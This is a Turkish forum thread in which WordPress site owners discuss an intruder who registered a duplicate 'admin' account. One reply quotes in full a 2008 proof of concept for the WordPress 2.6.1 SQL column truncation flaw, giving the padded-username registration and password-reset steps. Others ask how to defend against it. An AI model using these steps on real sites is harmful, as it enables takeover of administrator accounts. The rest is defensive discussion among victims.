|
hacked! admin kullanıcısı 2 tane oldu Arkadaşlar kendini birşey sanan arkadaş:) gelmiş admin kullanıcı ismiyle üye olmuş. Aynı kullanıcı ismi ile 2 kişi görünüyor ve giriş yapamıyordum. Sildim şifre değiştirdim. Ne önerirsiniz? |
Tüm dosyaların CHMOD ayarlarını 664 yap |
bana da yaptı bir kere denio nun biri :) birde üşenmemiş tüm postları editleyip hacked by denio yazmış :D |
644:o daha da mı düşüreyim şu an üyeliği kapattım peşinden:) ama okul sitesi millet üyelik nerde diye bağırıyor |
Alıntı:
|
siz nasıl çözdünüz |
nasıl ya? ben şimdi anlamadım. birisi gelip wp sitemize "admin" kullanıcı adıyla kayıt olunca direk admin (yönetici) mi oluyor yani?? |
ewet aynen öyle adam register üye olurken exploiti bu # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC) # # found by irk4z[at]yahoo.pl # homepage: http://irk4z.wordpress.com/ # # this is not critical vuln [; # # first, read this discovery: # http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/ # # in this hack we can remote change admin password, if registration enabled # # greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x email: your email ^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com [2008-09-07] |
yani "admin" nicki hemen biz yapalimki böyle olay basimiza gelmesin öylemi? veya baska bisey yapabilirmiyiz ? |
| Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 13:09:19. |
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.